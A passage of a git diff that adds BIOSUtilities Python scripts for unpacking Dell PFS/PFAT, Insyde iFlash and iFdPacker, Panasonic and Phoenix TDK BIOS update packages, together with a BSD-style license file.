is_sfam,_,_,_,_ = pfat_hdr.get_flags() + + # Parse sub-PFS PFAT Signature, if applicable (only when PFAT Header > SFAM flag is set) + if is_sfam and len(pfat_payload[pfat_payload_end:pfat_payload_end + PFAT_SIG_LEN]) == PFAT_SIG_LEN: + # Get sub-PFS PFAT Signature Structure values + pfat_sig = get_struct(pfat_payload, pfat_payload_end, IntelBiosGuardSignature2k) + + # Show sub-PFS PFAT Signature Structure info + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Signature:\n', padding + 12) + pfat_sig.struct_print(padding + 16) + + # Show PFAT Script via BIOS Guard Script Tool + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Script:\n', padding + 12) + + _ = parse_bg_script(pfat_script_data, padding + 16) + + # The payload of sub-PFS PFAT Entries is not in proper order by default + # We can get each payload's order from PFAT Script > OpCode #2 (set I0 imm) + # PFAT Script OpCode #2 > Operand #3 stores the payload Offset in final image + pfat_entry_off = int.from_bytes(pfat_script_data[0xC:0x10], 'little') + + # We can get each payload's length from PFAT Script > OpCode #4 (set I2 imm) + # PFAT Script OpCode #4 > Operand #3 stores the payload Length in final image + pfat_entry_len = int.from_bytes(pfat_script_data[0x1C:0x20], 'little') + + # Check that the PFAT Entry Length from Header & Script match + if pfat_hdr.DataSize != pfat_entry_len: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Header & Script Length mismatch!', padding + 12) + + # Initialize sub-PFS PFAT Entry Metadata Address + pfat_entry_adr = pfat_entry_off + + # Parse sub-PFS PFAT Entry/Block Metadata + if len(pfat_entry_met) >= PFS_PFAT_LEN: + # Get sub-PFS PFAT Metadata Structure values + pfat_met = get_struct(pfat_entry_met, 0, DellPfsPfatMetadata) + + # Store sub-PFS PFAT Entry Metadata Address + pfat_entry_adr = pfat_met.Address + + # Show sub-PFS PFAT Metadata Structure info + if structure: + printer(f'PFAT Block {pfat_entry_idx_ord} - Metadata:\n', padding + 12) + pfat_met.struct_print(padding + 16) + + # Another way to get each PFAT Entry Offset is from its Metadata, if applicable + # Check that the PFAT Entry Offsets from PFAT Script and PFAT Metadata match + if pfat_entry_off != pfat_met.Offset: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Metadata & PFAT Offset mismatch!', padding + 16) + pfat_entry_off = pfat_met.Offset # Prefer Offset from Metadata, in case PFAT Script differs + + # Another way to get each PFAT Entry Length is from its Metadata, if applicable + # Check that the PFAT Entry Length from PFAT Script and PFAT Metadata match + if not (pfat_hdr.DataSize == pfat_entry_len == pfat_met.DataSize): + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Metadata & PFAT Length mismatch!', padding + 16) + + # Check that the PFAT Entry payload Size from PFAT Header matches the one from PFAT Metadata + if pfat_hdr.DataSize != pfat_met.DataSize: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} Metadata & PFAT Block Size mismatch!', padding + 16) + + # Get sub-PFS Entry Raw Data by subtracting PFAT Header & Script from PFAT Entry Data + pfat_entry_data_raw = pfat_entry_data[pfat_hdr_bgs_size:] + + # The sub-PFS Entry Raw Data (w/o PFAT Header & Script) should match with the PFAT Block payload + if pfat_entry_data_raw != pfat_payload_data: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} w/o PFAT & PFAT Block Data mismatch!', padding + 16) + pfat_entry_data_raw = pfat_payload_data # Prefer Data from PFAT Block, in case PFAT Entry differs + + # Store each sub-PFS PFAT Entry/Block Offset, Address, Ordinal Index and Payload/Raw Data + # Goal is to sort these based on Offset first and Address second, in cases of same Offset + # For example, Precision 3430 has two PFAT Entries with the same Offset of 0x40000 at both + # BG Script and PFAT Metadata but their PFAT Metadata Address is 0xFF040000 and 0xFFA40000 + pfat_entries_all.append((pfat_entry_off, pfat_entry_adr, pfat_entry_idx_ord, pfat_entry_data_raw)) + + # Check if next sub-PFS PFAT Entry offset is valid + if pfat_next_entry <= 0: + printer(f'Error: Detected sub-PFS PFAT Block {pfat_entry_idx_ord} with invalid next PFAT Block offset!', padding + 16) + pfat_next_entry += pfs_entry_size # Avoid a potential infinite loop if next sub-PFS PFAT Entry offset is bad + + pfat_entry_start = pfat_next_entry # Next sub-PFS PFAT Entry starts after sub-PFS Entry Metadata Signature + + pfat_entry_index += 1 + + pfat_entries_all.sort() # Sort all sub-PFS PFAT Entries based on their Offset/Address + + block_start_exp = 0 # Initialize sub-PFS PFAT Entry expected Offset + total_pfat_data = b'' # Initialize final/ordered sub-PFS Entry Data + + # Parse all sorted sub-PFS PFAT Entries and merge their payload/data + for block_start,_,block_index,block_data in pfat_entries_all: + # Fill any data gaps between sorted sub-PFS PFAT Entries with padding + # For example, Precision 7960 v0.16.68 has gap at 0x1190000-0x11A0000 + block_data_gap = block_start - block_start_exp + if block_data_gap > 0: + printer(f'Warning: Filled sub-PFS PFAT {block_index} data gap 0x{block_data_gap:X} [0x{block_start_exp:X}-0x{block_start:X}]!', padding + 8) + total_pfat_data += b'\xFF' * block_data_gap # Use 0xFF padding to fill in data gaps in PFAT UEFI firmware images + + total_pfat_data += block_data # Append sorted sub-PFS PFAT Entry payload/data + + block_start_exp = len(total_pfat_data) # Set next sub-PFS PFAT Entry expected Start + + # Verify that the end offset of the last PFAT Entry matches the final sub-PFS Entry Data Size + if len(total_pfat_data) != pfat_entries_all[-1][0] + len(pfat_entries_all[-1][3]): + printer('Error: Detected sub-PFS PFAT total buffer size and last block end mismatch!', padding + 8) + + # Analyze sub-PFS Footer Structure + chk_pfs_ftr(pfat_footer, pfat_payload, entry_hdr.PayloadSize, 'Sub-PFS', padding + 4, structure) + + return total_pfat_data + +# Get Dell PFS Entry Structure & Size via its Version +def get_pfs_entry(buffer, offset): + pfs_entry_ver = int.from_bytes(buffer[offset + 0x10:offset + 0x14], 'little') # PFS Entry Version + + if pfs_entry_ver == 1: + return DellPfsEntryR1, ctypes.sizeof(DellPfsEntryR1) + + if pfs_entry_ver == 2: + return DellPfsEntryR2, ctypes.sizeof(DellPfsEntryR2) + + return DellPfsEntryR2, ctypes.sizeof(DellPfsEntryR2) + +# Determine Dell PFS Entry Version string +def get_entry_ver(version_fields, version_types): + version = '' # Initialize Version string + + # Each Version Type (1 byte) determines the type of each Version Value (2 bytes) + # Version Type 'N' is Number, 'A' is Text and ' ' is Empty/Unused + for index,field in enumerate(version_fields): + eol = '' if index == len(version_fields) - 1 else '.' + + if version_types[index] == 65: + version += f'{field:X}{eol}' # 0x41 = ASCII + elif version_types[index] == 78: + version += f'{field:d}{eol}' # 0x4E = Number + elif version_types[index] in (0, 32): + version = version.strip('.') # 0x00 or 0x20 = Unused + else: + version += f'{field:X}{eol}' # Unknown + + return version + +# Check if Dell PFS Header Version is known +def chk_hdr_ver(version, text, padding=0): + if version in (1,2): + return + + printer(f'Error: Unknown {text} Header Version {version}!', padding) + + return + +# Analyze Dell PFS Footer Structure +def chk_pfs_ftr(footer_buffer, data_buffer, data_size, text, padding=0, structure=True): + # Get PFS Footer Structure values + pfs_ftr = get_struct(footer_buffer, 0, DellPfsFooter) + + # Validate that a PFS Footer was parsed + if pfs_ftr.Tag == b'PFS.FTR.': + # Show PFS Footer Structure info + if structure: + printer('PFS Footer:\n', padding + 4) + pfs_ftr.struct_print(padding + 8) + else: + printer(f'Error: {text} Footer could not be found!', padding + 4) + + # Validate that PFS Header Payload Size matches the one at PFS Footer + if data_size != pfs_ftr.PayloadSize: + printer(f'Error: {text} Header & Footer Payload Size mismatch!', padding + 4) + + # Calculate the PFS Payload Data CRC-32 w/ Vector 0 + pfs_ftr_crc = ~zlib.crc32(data_buffer, 0) & 0xFFFFFFFF + + # Validate PFS Payload Data Checksum via PFS Footer + if pfs_ftr.Checksum != pfs_ftr_crc: + printer(f'Error: Invalid {text} Footer Payload Checksum!', padding + 4) + +# Write/Extract Dell PFS Entry Files (Data, Metadata, Signature) +def pfs_file_write(bin_buff, bin_name, bin_type, full_name, out_path, padding=0, structure=True, advanced=True): + # Store Data/Metadata Signature (advanced users only) + if bin_name.startswith('sign'): + final_name = f'{safe_name(full_name)}.{bin_name.split("_")[1]}.sig' + final_path = os.path.join(out_path, final_name) + + with open(final_path, 'wb') as pfs_out: + pfs_out.write(bin_buff) # Write final Data/Metadata Signature + + return # Skip further processing for Signatures + + # Store Data/Metadata Payload + bin_ext = f'.{bin_name}.bin' if advanced else '.bin' # Simpler Data/Metadata Extension for non-advanced users + + # Some Data may be Text or XML files with useful information for non-advanced users + is_text,final_data,file_ext,write_mode = bin_is_text(bin_buff, bin_type, bin_name == 'meta', padding, structure, advanced) + + final_name = f'{safe_name(full_name)}{bin_ext[:-4] + file_ext if is_text else bin_ext}' + final_path = os.path.join(out_path, final_name) + + with open(final_path, write_mode) as pfs_out: + pfs_out.write(final_data) # Write final Data/Metadata Payload + +# Check if Dell PFS Entry file/data is Text/XML and Convert +def bin_is_text(buffer, file_type, is_metadata, padding=0, structure=True, advanced=True): + is_text = False + write_mode = 'wb' + extension = '.bin' + buffer_in = buffer + + if b',END' in buffer[-0x8:]: # Text Type 1 + is_text = True + write_mode = 'w' + extension = '.txt' + buffer = buffer.decode('utf-8').split(',END')[0].replace(';','\n') + elif buffer.startswith(b'VendorName=Dell'): # Text Type 2 + is_text = True + write_mode = 'w' + extension = '.txt' + buffer = buffer.split(b'\x00')[0].decode('utf-8').replace(';','\n') + elif b' len(input_buffer): + continue + + iflash_match_all.append([ifl_bgn, ifl_hdr]) + + return iflash_match_all + +# Extract Insyde iFlash Update image +def insyde_iflash_extract(input_buffer, extract_path, padding=0): + insyde_iflash_all = insyde_iflash_detect(input_buffer) + + if not insyde_iflash_all: + return 127 + + printer('Detected Insyde iFlash Update image!', padding) + + make_dirs(extract_path, delete=True) + + exit_codes = [] + + for insyde_iflash in insyde_iflash_all: + exit_code = 0 + + ifl_bgn,ifl_hdr = insyde_iflash + + img_bgn = ifl_bgn + INS_IFL_LEN + img_end = img_bgn + ifl_hdr.ImageSize + img_bin = input_buffer[img_bgn:img_end] + + if len(img_bin) != ifl_hdr.ImageSize: + exit_code = 1 + + img_val = [ifl_hdr.get_image_tag(), 'bin'] + img_tag,img_ext = INS_IFL_IMG.get(img_val[0], img_val) + + img_name = f'{img_tag} [0x{img_bgn:08X}-0x{img_end:08X}]' + + printer(f'{img_name}\n', padding + 4) + + ifl_hdr.struct_print(padding + 8) + + if img_val == [img_tag,img_ext]: + printer(f'Note: Detected new Insyde iFlash tag {img_tag}!', padding + 12, pause=True) + + out_name = f'{img_name}.{img_ext}' + + out_path = os.path.join(extract_path, safe_name(out_name)) + + with open(out_path, 'wb') as out_image: + out_image.write(img_bin) + + printer(f'Succesfull Insyde iFlash > {img_tag} extraction!', padding + 12) + + exit_codes.append(exit_code) + + return sum(exit_codes) + +# Extract Insyde iFdPacker 7-Zip SFX 7z Update image +def insyde_packer_extract(input_buffer, extract_path, padding=0): + match_sfx = PAT_INSYDE_SFX.search(input_buffer) + + if not match_sfx: + return 127 + + printer('Detected Insyde iFdPacker Update image!', padding) + + make_dirs(extract_path, delete=True) + + sfx_buffer = bytearray(input_buffer[match_sfx.end() - 0x5:]) + + if sfx_buffer[:0x5] == b'\x6E\xF4\x79\x5F\x4E': + printer('Detected Insyde iFdPacker > 7-Zip SFX > Obfuscation!', padding + 4) + + for index,byte in enumerate(sfx_buffer): + sfx_buffer[index] = byte // 2 + (128 if byte % 2 else 0) + + printer('Removed Insyde iFdPacker > 7-Zip SFX > Obfuscation!', padding + 8) + + printer('Extracting Insyde iFdPacker > 7-Zip SFX archive...', padding + 4) + + if bytes(INS_SFX_PWD, 'utf-16le') in input_buffer[:match_sfx.start()]: + printer('Detected Insyde iFdPacker > 7-Zip SFX > Password!', padding + 8) + printer(INS_SFX_PWD, padding + 12) + + sfx_path = os.path.join(extract_path, 'Insyde_iFdPacker_SFX.7z') + + with open(sfx_path, 'wb') as sfx_file: + sfx_file.write(sfx_buffer) + + if is_szip_supported(sfx_path, padding + 8, args=[f'-p{INS_SFX_PWD}'], check=True): + if szip_decompress(sfx_path, extract_path, 'Insyde iFdPacker > 7-Zip SFX', + padding + 8, args=[f'-p{INS_SFX_PWD}'], check=True) == 0: + os.remove(sfx_path) + else: + return 125 + else: + return 126 + + exit_codes = [] + + for sfx_file in get_path_files(extract_path): + if is_insyde_ifd(sfx_file): + printer(f'{os.path.basename(sfx_file)}', padding + 12) + + ifd_code = insyde_ifd_extract(sfx_file, get_extract_path(sfx_file), padding + 16) + + exit_codes.append(ifd_code) + + return sum(exit_codes) + +# Insyde iFdPacker known 7-Zip SFX Password +INS_SFX_PWD = 'Y`t~i!L@i#t$U%h^s7A*l(f)E-d=y+S_n?i' + +# Insyde iFlash known Image Names +INS_IFL_IMG = { + 'BIOSCER' : ['Certificate', 'bin'], + 'BIOSCR2' : ['Certificate 2nd', 'bin'], + 'BIOSIMG' : ['BIOS-UEFI', 'bin'], + 'DRV_IMG' : ['isflash', 'efi'], + 'EC_IMG' : ['Embedded Controller', 'bin'], + 'INI_IMG' : ['platform', 'ini'], + 'ME_IMG' : ['Management Engine', 'bin'], + 'OEM_ID' : ['OEM Identifier', 'bin'], + } + +# Get common ctypes Structure Sizes +INS_IFL_LEN = ctypes.sizeof(IflashHeader) + +if __name__ == '__main__': + BIOSUtility(TITLE, is_insyde_ifd, insyde_ifd_extract).run_utility() diff --git a/blobs/t480/biosutilities/LICENSE b/blobs/t480/biosutilities/LICENSE new file mode 100644 index 00000000..06831fb2 --- /dev/null +++ b/blobs/t480/biosutilities/LICENSE @@ -0,0 +1,19 @@ +Copyright (c) 2019-2022 Plato Mavropoulos + +Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. + +Subject to the terms and conditions of this license, each copyright holder and contributor hereby grants to those receiving rights under this license a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except for failure to satisfy the conditions of this license) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer this software, where such license applies only to those patent claims, already acquired or hereafter acquired, licensable by such copyright holder or contributor that are necessarily infringed by: + +(a) their Contribution(s) (the licensed copyrights of copyright holders and non-copyrightable additions of contributors, in source or binary form) alone; or + +(b) combination of their Contribution(s) with the work of authorship to which such Contribution(s) was added by such copyright holder or contributor, if, at the time the Contribution is added, such addition causes such combination to be necessarily infringed. The patent license shall not apply to any other combinations which include the Contribution. + +Except as expressly stated above, no rights or licenses from any copyright holder or contributor is granted under this license, whether expressly, by implication, estoppel or otherwise. + +DISCLAIMER + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/blobs/t480/biosutilities/Panasonic_BIOS_Extract.py b/blobs/t480/biosutilities/Panasonic_BIOS_Extract.py new file mode 100644 index 00000000..096bec3d --- /dev/null +++ b/blobs/t480/biosutilities/Panasonic_BIOS_Extract.py @@ -0,0 +1,209 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Panasonic BIOS Extract +Panasonic BIOS Package Extractor +Copyright (C) 2018-2022 Plato Mavropoulos +""" + +TITLE = 'Panasonic BIOS Package Extractor v2.0_a10' + +import os +import io +import sys +import lznt1 +import pefile + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.comp_szip import is_szip_supported, szip_decompress +from common.path_ops import get_path_files, make_dirs, path_stem, safe_name +from common.pe_ops import get_pe_file, get_pe_info, is_pe_file, show_pe_info +from common.patterns import PAT_MICROSOFT_CAB +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +from AMI_PFAT_Extract import is_ami_pfat, parse_pfat_file + +# Check if input is Panasonic BIOS Package PE +def is_panasonic_pkg(in_file): + in_buffer = file_to_bytes(in_file) + + pe_file = get_pe_file(in_buffer, fast=True) + + if not pe_file: + return False + + pe_info = get_pe_info(pe_file) + + if not pe_info: + return False + + if pe_info.get(b'FileDescription',b'').upper() != b'UNPACK UTILITY': + return False + + if not PAT_MICROSOFT_CAB.search(in_buffer): + return False + + return True + +# Search and Extract Panasonic BIOS Package PE CAB archive +def panasonic_cab_extract(buffer, extract_path, padding=0): + pe_path,pe_file,pe_info = [None] * 3 + + cab_bgn = PAT_MICROSOFT_CAB.search(buffer).start() + cab_len = int.from_bytes(buffer[cab_bgn + 0x8:cab_bgn + 0xC], 'little') + cab_end = cab_bgn + cab_len + cab_bin = buffer[cab_bgn:cab_end] + cab_tag = f'[0x{cab_bgn:06X}-0x{cab_end:06X}]' + + cab_path = os.path.join(extract_path, f'CAB_{cab_tag}.cab') + + with open(cab_path, 'wb') as cab_file: + cab_file.write(cab_bin) # Store CAB archive + + if is_szip_supported(cab_path, padding, check=True): + printer(f'Panasonic BIOS Package > PE > CAB {cab_tag}', padding) + + if szip_decompress(cab_path, extract_path, 'CAB', padding + 4, check=True) == 0: + os.remove(cab_path) # Successful extraction, delete CAB archive + else: + return pe_path, pe_file, pe_info + else: + return pe_path, pe_file, pe_info + + for file_path in get_path_files(extract_path): + pe_file = get_pe_file(file_path, fast=True) + if pe_file: + pe_info = get_pe_info(pe_file) + if pe_info.get(b'FileDescription',b'').upper() == b'BIOS UPDATE': + pe_path = file_path + break + else: + return pe_path, pe_file, pe_info + + return pe_path, pe_file, pe_info + +# Extract & Decompress Panasonic BIOS Update PE RCDATA (LZNT1) +def panasonic_res_extract(pe_name, pe_file, extract_path, padding=0): + is_rcdata = False + + # When fast_load is used, IMAGE_DIRECTORY_ENTRY_RESOURCE must be parsed prior to RCDATA Directories + pe_file.parse_data_directories(directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE']]) + + # Parse all Resource Data Directories > RCDATA (ID = 10) + for entry in pe_file.DIRECTORY_ENTRY_RESOURCE.entries: + if entry.struct.name == 'IMAGE_RESOURCE_DIRECTORY_ENTRY' and entry.struct.Id == 0xA: + is_rcdata = True + for resource in entry.directory.entries: + res_bgn = resource.directory.entries[0].data.struct.OffsetToData + res_len = resource.directory.entries[0].data.struct.Size + res_end = res_bgn + res_len + res_bin = pe_file.get_data(res_bgn, res_len) + res_tag = f'{pe_name} [0x{res_bgn:06X}-0x{res_end:06X}]' + res_out = os.path.join(extract_path, f'{res_tag}') + + printer(res_tag, padding + 4) + + try: + res_raw = lznt1.decompress(res_bin[0x8:]) + + printer('Succesfull LZNT1 decompression via lznt1!', padding + 8) + except Exception: + res_raw = res_bin + + printer('Succesfull PE Resource extraction!', padding + 8) + + # Detect & Unpack AMI BIOS Guard (PFAT) BIOS image + if is_ami_pfat(res_raw): + pfat_dir = os.path.join(extract_path, res_tag) + + parse_pfat_file(res_raw, pfat_dir, padding + 12) + else: + if is_pe_file(res_raw): + res_ext = 'exe' + elif res_raw.startswith(b'[') and res_raw.endswith((b'\x0D\x0A',b'\x0A')): + res_ext = 'txt' + else: + res_ext = 'bin' + + if res_ext == 'txt': + printer(new_line=False) + for line in io.BytesIO(res_raw).readlines(): + line_text = line.decode('utf-8','ignore').rstrip() + printer(line_text, padding + 12, new_line=False) + + with open(f'{res_out}.{res_ext}', 'wb') as out_file: + out_file.write(res_raw) + + return is_rcdata + +# Extract Panasonic BIOS Update PE Data when RCDATA is not available +def panasonic_img_extract(pe_name, pe_path, pe_file, extract_path, padding=0): + pe_data = file_to_bytes(pe_path) + + sec_bgn = pe_file.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress + img_bgn = pe_file.OPTIONAL_HEADER.BaseOfData + pe_file.OPTIONAL_HEADER.SizeOfInitializedData + img_end = sec_bgn or len(pe_data) + img_bin = pe_data[img_bgn:img_end] + img_tag = f'{pe_name} [0x{img_bgn:X}-0x{img_end:X}]' + img_out = os.path.join(extract_path, f'{img_tag}.bin') + + printer(img_tag, padding + 4) + + with open(img_out, 'wb') as out_img: + out_img.write(img_bin) + + printer('Succesfull PE Data extraction!', padding + 8) + + return bool(img_bin) + +# Parse & Extract Panasonic BIOS Package PE +def panasonic_pkg_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + pkg_pe_file = get_pe_file(input_buffer, fast=True) + + if not pkg_pe_file: + return 2 + + pkg_pe_info = get_pe_info(pkg_pe_file) + + if not pkg_pe_info: + return 3 + + pkg_pe_name = path_stem(input_file) + + printer(f'Panasonic BIOS Package > PE ({pkg_pe_name})\n', padding) + + show_pe_info(pkg_pe_info, padding + 4) + + upd_pe_path,upd_pe_file,upd_pe_info = panasonic_cab_extract(input_buffer, extract_path, padding + 4) + + if not (upd_pe_path and upd_pe_file and upd_pe_info): + return 4 + + upd_pe_name = safe_name(path_stem(upd_pe_path)) + + printer(f'Panasonic BIOS Update > PE ({upd_pe_name})\n', padding + 12) + + show_pe_info(upd_pe_info, padding + 16) + + is_upd_res, is_upd_img = False, False + + is_upd_res = panasonic_res_extract(upd_pe_name, upd_pe_file, extract_path, padding + 16) + + if not is_upd_res: + is_upd_img = panasonic_img_extract(upd_pe_name, upd_pe_path, upd_pe_file, extract_path, padding + 16) + + os.remove(upd_pe_path) + + return 0 if is_upd_res or is_upd_img else 1 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_panasonic_pkg, panasonic_pkg_extract).run_utility() diff --git a/blobs/t480/biosutilities/Phoenix_TDK_Extract.py b/blobs/t480/biosutilities/Phoenix_TDK_Extract.py new file mode 100644 index 00000000..3328ad41 --- /dev/null +++ b/blobs/t480/biosutilities/Phoenix_TDK_Extract.py @@ -0,0 +1,243 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Phoenix TDK Extract +Phoenix TDK Packer Extractor +Copyright (C) 2021-2022 Plato Mavropoulos +""" + +TITLE = 'Phoenix TDK Packer Extractor v2.0_a10' + +import os +import sys +import lzma +import ctypes + +# Stop __pycache__ generation +sys.dont_write_bytecode = True + +from common.path_ops import make_dirs, safe_name +from common.pe_ops import get_pe_file, get_pe_info +from common.patterns import PAT_MICROSOFT_MZ, PAT_MICROSOFT_PE, PAT_PHOENIX_TDK +from common.struct_ops import char, get_struct, uint32_t +from common.system import printer +from common.templates import BIOSUtility +from common.text_ops import file_to_bytes + +class PhoenixTdkHeader(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Tag', char*8), # 0x00 + ('Size', uint32_t), # 0x08 + ('Count', uint32_t), # 0x0C + # 0x10 + ] + + def _get_tag(self): + return self.Tag.decode('utf-8','ignore').strip() + + def struct_print(self, p): + printer(['Tag :', self._get_tag()], p, False) + printer(['Size :', f'0x{self.Size:X}'], p, False) + printer(['Entries:', self.Count], p, False) + +class PhoenixTdkEntry(ctypes.LittleEndianStructure): + _pack_ = 1 + _fields_ = [ + ('Name', char*256), # 0x000 + ('Offset', uint32_t), # 0x100 + ('Size', uint32_t), # 0x104 + ('Compressed', uint32_t), # 0x108 + ('Reserved', uint32_t), # 0x10C + # 0x110 + ] + + COMP = {0: 'None', 1: 'LZMA'} + + def __init__(self, mz_base, *args, **kwargs): + super().__init__(*args, **kwargs) + self.Base = mz_base + + def get_name(self): + return self.Name.decode('utf-8','replace').strip() + + def get_offset(self): + return self.Base + self.Offset + + def get_compression(self): + return self.COMP.get(self.Compressed, f'Unknown ({self.Compressed})') + + def struct_print(self, p): + printer(['Name :', self.get_name()], p, False) + printer(['Offset :', f'0x{self.get_offset():X}'], p, False) + printer(['Size :', f'0x{self.Size:X}'], p, False) + printer(['Compression:', self.get_compression()], p, False) + printer(['Reserved :', f'0x{self.Reserved:X}'], p, False) + +# Get Phoenix TDK Executable (MZ) Base Offset +def get_tdk_base(in_buffer, pack_off): + tdk_base_off = None # Initialize Phoenix TDK Base MZ Offset + + # Scan input file for all Microsoft executable patterns (MZ) before TDK Header Offset + mz_all = [mz for mz in PAT_MICROSOFT_MZ.finditer(in_buffer) if mz.start() < pack_off] + + # Phoenix TDK Header structure is an index table for all TDK files + # Each TDK file is referenced from the TDK Packer executable base + # The TDK Header is always at the end of the TDK Packer executable + # Thus, prefer the TDK Packer executable (MZ) closest to TDK Header + # For speed, check MZ closest to (or at) 0x0 first (expected input) + mz_ord = [mz_all[0]] + list(reversed(mz_all[1:])) + + # Parse each detected MZ + for mz in mz_ord: + mz_off = mz.start() + + # MZ (DOS) > PE (NT) image Offset is found at offset 0x3C-0x40 relative to MZ base + pe_off = mz_off + int.from_bytes(in_buffer[mz_off + 0x3C:mz_off + 0x40], 'little') + + # Skip MZ (DOS) with bad PE (NT) image Offset + if pe_off == mz_off or pe_off >= pack_off: + continue + + # Check if potential MZ > PE image magic value is valid + if PAT_MICROSOFT_PE.search(in_buffer[pe_off:pe_off + 0x4]): + try: + # Parse detected MZ > PE > Image, quickly (fast_load) + pe_file = get_pe_file(in_buffer[mz_off:], fast=True) + + # Parse detected MZ > PE > Info + pe_info = get_pe_info(pe_file) + + # Parse detected MZ > PE > Info > Product Name + pe_name = pe_info.get(b'ProductName',b'') + except Exception: + # Any error means no MZ > PE > Info > Product Name + pe_name = b'' + + # Check for valid Phoenix TDK Packer PE > Product Name + # Expected value is "TDK Packer (Extractor for Windows)" + if pe_name.upper().startswith(b'TDK PACKER'): + # Set TDK Base Offset to valid TDK Packer MZ offset + tdk_base_off = mz_off + + # Stop parsing detected MZ once TDK Base Offset is found + if tdk_base_off is not None: + break + else: + # No TDK Base Offset could be found, assume 0x0 + tdk_base_off = 0x0 + + return tdk_base_off + +# Scan input buffer for valid Phoenix TDK image +def get_phoenix_tdk(in_buffer): + # Scan input buffer for Phoenix TDK pattern + tdk_match = PAT_PHOENIX_TDK.search(in_buffer) + + if not tdk_match: + return None, None + + # Set Phoenix TDK Header ($PACK) Offset + tdk_pack_off = tdk_match.start() + + # Get Phoenix TDK Executable (MZ) Base Offset + tdk_base_off = get_tdk_base(in_buffer, tdk_pack_off) + + return tdk_base_off, tdk_pack_off + +# Check if input contains valid Phoenix TDK image +def is_phoenix_tdk(in_file): + buffer = file_to_bytes(in_file) + + return bool(get_phoenix_tdk(buffer)[1] is not None) + +# Parse & Extract Phoenix Tools Development Kit (TDK) Packer +def phoenix_tdk_extract(input_file, extract_path, padding=0): + exit_code = 0 + + input_buffer = file_to_bytes(input_file) + + make_dirs(extract_path, delete=True) + + printer('Phoenix Tools Development Kit Packer', padding) + + base_off,pack_off = get_phoenix_tdk(input_buffer) + + # Parse TDK Header structure + tdk_hdr = get_struct(input_buffer, pack_off, PhoenixTdkHeader) + + # Print TDK Header structure info + printer('Phoenix TDK Header:\n', padding + 4) + tdk_hdr.struct_print(padding + 8) + + # Check if reported TDK Header Size matches manual TDK Entry Count calculation + if tdk_hdr.Size != TDK_HDR_LEN + TDK_DUMMY_LEN + tdk_hdr.Count * TDK_MOD_LEN: + printer('Error: Phoenix TDK Header Size & Entry Count mismatch!\n', padding + 8, pause=True) + exit_code = 1 + + # Store TDK Entries offset after the placeholder data + entries_off = pack_off + TDK_HDR_LEN + TDK_DUMMY_LEN + + # Parse and extract each TDK Header Entry + for entry_index in range(tdk_hdr.Count): + # Parse TDK Entry structure + tdk_mod = get_struct(input_buffer, entries_off + entry_index * TDK_MOD_LEN, PhoenixTdkEntry, [base_off]) + + # Print TDK Entry structure info + printer(f'Phoenix TDK Entry ({entry_index + 1}/{tdk_hdr.Count}):\n', padding + 8) + tdk_mod.struct_print(padding + 12) + + # Get TDK Entry raw data Offset (TDK Base + Entry Offset) + mod_off = tdk_mod.get_offset() + + # Check if TDK Entry raw data Offset is valid + if mod_off >= len(input_buffer): + printer('Error: Phoenix TDK Entry > Offset is out of bounds!\n', padding + 12, pause=True) + exit_code = 2 + + # Store TDK Entry raw data (relative to TDK Base, not TDK Header) + mod_data = input_buffer[mod_off:mod_off + tdk_mod.Size] + + # Check if TDK Entry raw data is complete + if len(mod_data) != tdk_mod.Size: + printer('Error: Phoenix TDK Entry > Data is truncated!\n', padding + 12, pause=True) + exit_code = 3 + + # Check if TDK Entry Reserved is present + if tdk_mod.Reserved: + printer('Error: Phoenix TDK Entry > Reserved is not empty!\n', padding + 12, pause=True) + exit_code = 4 + + # Decompress TDK Entry raw data, when applicable (i.e. LZMA) + if tdk_mod.get_compression() == 'LZMA': + try: + mod_data = lzma.LZMADecompressor().decompress(mod_data) + except Exception: + printer('Error: Phoenix TDK Entry > LZMA decompression failed!\n', padding + 12, pause=True) + exit_code = 5 + + # Generate TDK Entry file name, avoid crash if Entry data is bad + mod_name = tdk_mod.get_name() or f'Unknown_{entry_index + 1:02d}.bin' + + # Generate TDK Entry file data output path + mod_file = os.path.join(extract_path, 